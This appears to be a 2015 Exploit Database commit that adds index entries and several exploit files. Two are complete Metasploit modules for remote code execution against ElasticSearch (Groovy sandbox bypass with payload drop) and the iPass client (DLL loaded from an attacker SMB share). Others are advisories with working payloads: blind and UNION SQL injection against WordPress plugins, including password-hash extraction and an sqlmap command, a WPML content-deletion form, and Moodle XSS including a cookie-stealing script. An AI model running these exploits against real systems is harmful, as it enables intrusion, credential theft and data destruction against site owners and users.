Update: 2015-03-18

6 new exploits
This commit is contained in:
Offensive Security 2015-03-18 08:36:08 +00:00
parent 51e5e42e74
commit ef2d63a0af
7 changed files with 703 additions and 0 deletions

View file

@ -32833,3 +32833,9 @@ id,file,description,date,author,platform,type,port
36408,platforms/php/webapps/36408.txt,"WordPress Pretty Link Plugin 1.5.2 'pretty-bar.php' Cross Site Scripting Vulnerability",2011-12-06,Am!r,php,webapps,0
36410,platforms/php/webapps/36410.txt,"Simple Machines Forum 1.1.15 ''fckeditor' Arbitrary File Upload Vulnerability",2011-12-06,HELLBOY,php,webapps,0
36411,platforms/windows/shellcode/36411.txt,"Shellcode Win x86-64 - Download & execute (Generator)",2015-03-16,"Ali Razmjoo",windows,shellcode,0
36412,platforms/windows/remote/36412.rb,"IPass Control Pipe Remote Command Execution",2015-03-16,metasploit,windows,remote,0
36413,platforms/aix/dos/36413.txt,"WordPress SEO by Yoast 1.7.3.3 - Blind SQL Injection",2015-03-16,"Ryan Dewhurst",aix,dos,0
36414,platforms/php/webapps/36414.txt,"WordPress WPML - Multiple Vulnerabilities",2015-03-16,"Jouko Pynnonen",php,webapps,80
36415,platforms/java/remote/36415.rb,"ElasticSearch Search Groovy Sandbox Bypass",2015-03-16,metasploit,java,remote,9200
36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
36418,platforms/php/webapps/36418.txt,"Moodle 2.5.9/2.6.8/2.7.5/2.8.3 - Block Title Handler Cross-Site Scripting",2015-03-17,LiquidWorm,php,webapps,0

Can't render this file because it is too large.

74
platforms/aix/dos/36413.txt Executable file
View file

@ -0,0 +1,74 @@
Title: WordPress SEO by Yoast <= 1.7.3.3 - Blind SQL Injection
Version/s Tested: 1.7.3.3
Patched Version: 1.7.4
CVSSv2 Base Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
CVSSv2 Temporal Score: 7 (AV:N/AC:L/Au:S/C:C/I:C/A:C/E:POC/RL:OF/RC:C)
WPVULNDB: https://wpvulndb.com/vulnerabilities/7841
Description:
WordPress SEO by Yoast is a popular WordPress plugin (wordpress-seo) used
to improve the Search Engine Optimization (SEO) of WordPress sites. The
latest version at the time of writing (1.7.3.3) has been found to be
affected by two authenticated (admin, editor or author user) Blind SQL
Injection vulnerabilities. The plugin has more than one million downloads
according to WordPress.
Technical Description:
The authenticated Blind SQL Injection vulnerability can be found within the
'admin/class-bulk-editor-list-table.php' file. The orderby and order GET
parameters are not sufficiently sanitised before being used within a SQL
query.
Line 529:
$orderby = ! empty( $_GET['orderby'] ) ? esc_sql( sanitize_text_field(
$_GET['orderby'] ) ) : 'post_title';
Line 533:
order = esc_sql( strtoupper( sanitize_text_field( $_GET['order'] ) ) );
If the GET orderby parameter value is not empty it will pass its value
through WordPess's own esc_sql() function. According to WordPress this
function 'Prepares a string for use as an SQL query. A glorified
addslashes() that works with arrays.'. However, this is not sufficient to
prevent SQL Injection as can be seen from our Proof of Concept.
Proof of Concept (PoC):
The following GET request will cause the SQL query to execute and sleep for
10 seconds if clicked on as an authenticated admin, editor or author user.
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
Using SQLMap:
python sqlmap.py -u "
http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc"
--batch --technique=B --dbms=MySQL --cookie="wordpress_9d...;
wordpress_logged_in_9dee67...;"
Impact:
As there is no anti-CSRF protection a remote unauthenticated attacker could
use this vulnerability to execute arbitrary SQL queries on the victim
WordPress web site by enticing an authenticated admin, editor or author
user to click on a specially crafted link or visit a page they control.
One possible attack scenario would be an attacker adding their own
administrative user to the target WordPress site, allowing them to
compromise the entire web site.
Timeline:
March 10th 2015 - 15:30 GMT: Vulnerability discovered by Ryan Dewhurst
(WPScan Team - Dewhurst Security).
March 10th 2015 - 18:30 GMT: Technical review by FireFart (WPScan Team).
March 10th 2015 - 20:00 GMT: Vendor contacted via email.
March 10th 2015 - 21:25 GMT: Vendor replies, confirms issue and gave
expected patch timeline.
March 11th 2015 - 12:05 GMT: Vendor released version 1.7.4 which patches
this issue.
March 11th 2015 - 12:30 GMT: Advisory released.

202
platforms/java/remote/36415.rb Executable file
View file

@ -0,0 +1,202 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ElasticSearch Search Groovy Sandbox Bypass',
'Description' => %q{
This module exploits a remote command execution (RCE) vulnerability in ElasticSearch,
exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the
REST API, which does not require authentication, where the search function allows
groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName
to reference arbitrary classes. It can be used to execute arbitrary Java code. This
module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04.
},
'Author' =>
[
'Cameron Morris', # Vulnerability discovery
'Darren Martyn', # Public Exploit
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-1427'],
['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'],
['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'],
['URL', 'http://drops.wooyun.org/papers/5107']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Targets' =>
[
['ElasticSearch 1.4.2', {}]
],
'DisclosureDate' => 'Feb 11 2015',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(9200),
OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"])
], self.class)
end
def check
result = Exploit::CheckCode::Safe
if vulnerable?
result = Exploit::CheckCode::Vulnerable
end
result
end
def exploit
print_status("#{peer} - Checking vulnerability...")
unless vulnerable?
fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...")
end
print_status("#{peer} - Discovering TEMP path...")
res = execute(java_tmp_dir)
tmp_dir = parse_result(res)
if tmp_dir.nil?
fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...")
else
print_good("#{peer} - TEMP path on '#{tmp_dir}'")
end
print_status("#{peer} - Discovering remote OS...")
res = execute(java_os)
os = parse_result(res)
if os.nil?
fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...")
else
print_good("#{peer} - Remote OS is '#{os}'")
end
if os =~ /win/i
tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar"
else
tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar")
end
register_files_for_cleanup(tmp_file)
print_status("#{peer} - Trying to load metasploit payload...")
java = java_load_class(os, tmp_file)
execute(java)
end
def vulnerable?
java = 'java.lang.Math.class.forName("java.lang.Runtime")'
vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...")
res = execute(java)
result = parse_result(res)
if result.nil?
vprint_status("#{peer} - no response to test")
return false
elsif result == 'class java.lang.Runtime'
return true
end
false
end
def parse_result(res)
unless res
vprint_error("#{peer} - No response")
return nil
end
unless res.code == 200 && res.body
vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)")
return nil
end
begin
json = JSON.parse(res.body.to_s)
rescue JSON::ParserError
return nil
end
begin
result = json['hits']['hits'][0]['fields']['msf_result']
rescue
return nil
end
result.is_a?(::Array) ? result.first : result
end
def java_tmp_dir
'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")'
end
def java_os
'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")'
end
def java_load_class(os, tmp_file)
if os =~ /win/i
tmp_file.gsub!(/\\/, '\\\\\\\\')
end
java = [
'c=java.lang.Math.class.forName("java.io.FileOutputStream");',
'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");',
"i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");",
'b64_i=b64.newInstance();',
"i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));",
'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");',
'file_class=java.lang.Math.class.forName("java.io.File");',
"file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();",
'loader=loader_class.newInstance();',
'loader.addURL(file_url);',
'm=loader.loadClass(\'metasploit.Payload\');',
'm.main(null);'
]
java.join
end
def execute(java, timeout = 20)
payload = {
"size" => 1,
"query" => {
"filtered" => {
"query" => {
"match_all" => {}
}
}
},
"script_fields" => {
"msf_result" => {
"script" => java
}
}
}
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path.to_s, "_search"),
'method' => 'POST',
'data' => JSON.generate(payload)
}, timeout)
res
end
end

106
platforms/php/webapps/36414.txt Executable file
View file

@ -0,0 +1,106 @@
OVERVIEW
==========
WPML is the industry standard for creating multi-lingual WordPress
sites. Three vulnerabilities were found in the plug-in. The most
serious of them, an SQL injection problem, allows anyone to read the
contents of the WordPress database, including user details and
password hashes, without authentication.
System administrators should update to version 3.1.9.1 released
earlier this week to resolve the issues.
DETAILS
========
1. SQL injection
When WPML processed a HTTP POST request containing the parameter
”action=wp-link-ajax”, the current language is determined by parsing
the HTTP referer. The parsed language code is not checked for
validity, nor SQL-escaped. The user doesnt need to be logged in.
By sending a carefully crafted referer value with the mentioned POST
request parameter, an attacker can perform SQL queries on arbitrary
tables and retrieve their results. In addition to the standard
WordPress database and tables, the attacker may query all other
databases and tables accessible to the web backend.
The following HTML snippet demonstrates the vulnerability:
<script>
var union="select
user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from
wp_users";
if (document.location.search.length < 2)
document.location.search="lang=xx' UNION "+union+" -- -- ";
</script>
<form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed">
<input type=hidden name=action value="wp-link-ajax">
<input type=submit>
</form>
The results of the SQL query will be shown in the comments feed XML-formatted.
2. Page/post/menu deletion
WPML contains a ”menu sync” function which helps site administrators
to keep WordPress menus consistent across different languages. This
functionality lacked any access control, allowing anyone to delete
practically all content of the website - posts, pages, and menus.
Example:
<form method=POST
action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php">
<input type=hidden name="action" value="icl_msync_confirm">
<input type=text name="sync" size=50 value="del[x][y][12345]=z">
<input type=submit>
</form>
Submitting the above form would delete the row with the ID 12345 in
the wp_posts database. Several items be deleted with the same request.
3. Reflected XSS
The ”reminder popup” code intended for administrators in WPML didnt
check for login status or nonce. An attacker can direct target users
to an URL like:
https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f
to execute JavaScript in their browser. This example bypasses the
Chrome XSS Auditor.
In the case of WordPress, XSS triggered by an administrator can lead
to server-side compromise via the plugin and theme editors.
CREDITS
========
The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while
researching WordPress plugins falling in the scope of the Facebook bug
bounty program.
The vendor was notified on March 02, 2015 and the patch was released
on March 10.
Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/
An up-to-date version of this document can be found on our website
http://klikki.fi .
--
Jouko Pynnönen <jouko@iki.fi>
Klikki Oy - http://klikki.fi

148
platforms/php/webapps/36418.txt Executable file
View file

@ -0,0 +1,148 @@
?
Moodle 2.5.9/2.6.8/2.7.5/2.8.3 Block Title Handler Cross-Site Scripting
Vendor: Moodle Pty Ltd
Product web page: https://www.moodle.org
Affected version: 2.8.3, 2.7.5, 2.6.8 and 2.5.9
Summary: Moodle is a learning platform designed to provide
educators, administrators and learners with a single robust,
secure and integrated system to create personalised learning
environments.
Desc: Moodle suffers from persistent XSS vulnerabilities. Input
passed to the POST parameters 'config_title' and 'title' thru
index.php, are not properly sanitized allowing the attacker to
execute HTML or JS code into user's browser session on the affected
site. Affected components: Blocks, Glossary, RSS and Tags.
Tested on: nginx
PHP/5.4.22
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5236
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5236.php
Vendor Advisory ID: MSA-15-0013
Vendor Advisory URL: https://moodle.org/mod/forum/discuss.php?d=307383
CVE ID: CVE-2015-2269
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2269
09.02.2015
--
Random Glossary Entry
---------------------
POST http://WEB/my/index.php HTTP/1.1
_qf__block_glossary_random_edit_form=1
bui_contexts=0
bui_defaultregion=side-pre
bui_defaultweight=4
bui_editid=304
bui_editingatfrontpage=0
bui_pagetypepattern=my-index
bui_parentcontextid=411
bui_region=side-pre
bui_subpagepattern=%@NULL@%
bui_visible=1
bui_weight=4
config_addentry=test
config_invisible=test2
config_refresh=0
config_showconcept=1
config_title=" onmouseover=prompt("XSS1") >
config_type=0
config_viewglossary=test3
mform_isexpanded_id_configheader=1
mform_isexpanded_id_onthispage=0
mform_isexpanded_id_whereheader=0
sesskey=S8TXvxdEKF
submitbutton=Save changes
Remote RSS Feeds
----------------
POST http://WEB/my/index.php HTTP/1.1
_qf__block_rss_client_edit_form=1
bui_contexts=0
bui_defaultregion=side-pre
bui_defaultweight=4
bui_editid=312
bui_editingatfrontpage=0
bui_pagetypepattern=my-index
bui_parentcontextid=411
bui_region=side-pre
bui_subpagepattern=%@NULL@%
bui_visible=1
bui_weight=4
config_block_rss_client_show_channel_image=0
config_block_rss_client_show_channel_link=0
config_display_description=0
config_rssid=_qf__force_multiselect_submission
config_rssid[]=3
config_shownumentries=11
config_title=" onmouseover=prompt("XSS2") >
mform_isexpanded_id_configheader=1
mform_isexpanded_id_onthispage=0
mform_isexpanded_id_whereheader=0
sesskey=S8TXvxdEKF
submitbutton=Save changes
Tags
----
POST http://WEB/my/index.php HTTP/1.1
_qf__block_tags_edit_form=1
bui_contexts=0
bui_defaultregion=side-pre
bui_defaultweight=4
bui_editid=313
bui_editingatfrontpage=0
bui_pagetypepattern=my-index
bui_parentcontextid=411
bui_region=side-pre
bui_subpagepattern=%@NULL@%
bui_visible=1
bui_weight=4
config_numberoftags=80
config_tagtype=
config_title=Tags" onmouseover=prompt("XSS3") >
mform_isexpanded_id_configheader=1
mform_isexpanded_id_onthispage=0
mform_isexpanded_id_whereheader=0
sesskey=S8TXvxdEKF
submitbutton=Save changes
Older not supported versions
----------------------------
POST http://WEB/blog/index.php HTTP/1.1
blockaction=config
filterselect=1343
filtertype=user
instanceid=4992
numberoftags=20
sesskey=0QCG5LQz0Q
sort=name
timewithin=90
title=ZSL"><script>alert(document.cookie);</script>

View file

@ -0,0 +1,53 @@
?
Spybot Search & Destroy 1.6.2 Security Center Service Privilege Escalation
Vendor: Safer-Networking Ltd.
Product web page: http://www.safer-networking.org
Affected version: 1.6.2
Summary: Spybot Search & Destroy (S&D) is a spyware and adware removal
computer program compatible with Microsoft Windows 95 and later. It scans
the computer hard disk and/or RAM for malicious software.
Desc: The application suffers from an unquoted search path issue impacting
the service 'SBSDWSCService' for Windows deployed as part of Spybot S&D.
This could potentially allow an authorized but non-privileged local
user to execute arbitrary code with elevated privileges on the system. A
successful attempt would require the local user to be able to insert their
code in the system root path undetected by the OS or other security applications
where it could potentially be executed during application startup or reboot.
If successful, the local users code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows Ultimate 7 SP1 (EN)
Vulnerability discovered by Aljaz Ceru
aljaz@insec.si
Advisory ID: ZSL-2015-5237
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5237.php
17.02.2015
---
C:\Users\user>sc qc SBSDWSCService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: SBSDWSCService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Spybot - Search & Destroy\SDWinSec.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : SBSD Security Center Service
DEPENDENCIES : wscsvc
SERVICE_START_NAME : LocalSystem
C:\Users\user>

114
platforms/windows/remote/36412.rb Executable file
View file

@ -0,0 +1,114 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::SMB::Server::Share
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'IPass Control Pipe Remote Command Execution',
'Description' => %q{
This module exploits a vulnerability in the IPass Client service. This service provides a
named pipe which can be accessed by the user group BUILTIN\Users. This pipe can be abused
to force the service to load a DLL from a SMB share.
},
'Author' =>
[
'Matthias Kaiser', # Vulnerability discovery
'h0ng10 <info[at]mogwaisecurity.de>', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-0925' ],
[ 'OSVDB', '117423' ],
[ 'BID', '72265' ],
[ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 2048,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x32', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
],
'Privileged' => true,
'DisclosureDate' => 'Jan 21 2015',
'DefaultTarget' => 0))
register_options(
[
OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
], self.class)
deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
end
def check
echo_value = rand_text_alphanumeric(rand(10) + 10)
begin
response = send_command("System.Echo #{echo_value}")
if response =~ Regexp.new(echo_value)
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Unknown
end
rescue Rex::ConnectionError => e
vprint_error("Connection failed: #{e.class}: #{e}")
return Msf::Exploit::CheckCode::Unknown
rescue Rex::Proto::SMB::Exceptions::LoginError => e
vprint_error('Connection reset during login')
return Msf::Exploit::CheckCode::Unknown
end
end
def setup
super
self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
self.share = Rex::Text.rand_text_alpha(5)
end
def primer
self.file_contents = generate_payload_dll
print_status("File available on #{unc}...")
send_command("iPass.SWUpdateAssist.RegisterCOM #{unc}")
end
def send_command(command)
# The connection is closed after each command, so we have to reopen it
connect
smb_login
pipe = simple.create_pipe('\\IPEFSYSPCPIPE')
pipe.write(Rex::Text.to_unicode(command))
response = Rex::Text.to_ascii(pipe.read)
response
end
def exploit
begin
Timeout.timeout(datastore['SMB_DELAY']) { super }
rescue Timeout::Error
# do nothing... just finish exploit and stop smb server...
end
end
end